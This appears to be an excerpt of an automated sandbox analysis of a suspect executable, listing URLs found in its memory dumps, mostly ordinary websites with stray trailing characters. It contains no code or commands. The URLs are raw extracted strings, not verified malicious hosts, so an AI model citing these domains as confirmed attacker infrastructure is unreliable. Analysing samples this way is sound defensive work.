                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389907841.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/;
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389907841.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/A
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/B2838757AE1B
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/Ob
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/e
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/ll
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/z=
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/9
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/e
                      Source: fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/h
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/q&m
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/c
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/H
                      Source: fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/rQj
                      Source: fs7AQcREFX.exe, 00000000.00000003.630948415.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.630948415.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/(
                      Source: fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/-/M
                      Source: fs7AQcREFX.exe, 00000000.00000003.630948415.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/8
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/E
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/KJ
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/rJ
                      Source: fs7AQcREFX.exe, 00000000.00000003.626959422.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.505979031.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/b
                      Source: fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/d
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/de/=
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/r
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389748262.0000000006170000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.505979031.0000000006157000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.0000000006170000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391362964.0000000006170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/ll8
                      Source: fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/om7
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/1
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/e
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/i
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/s
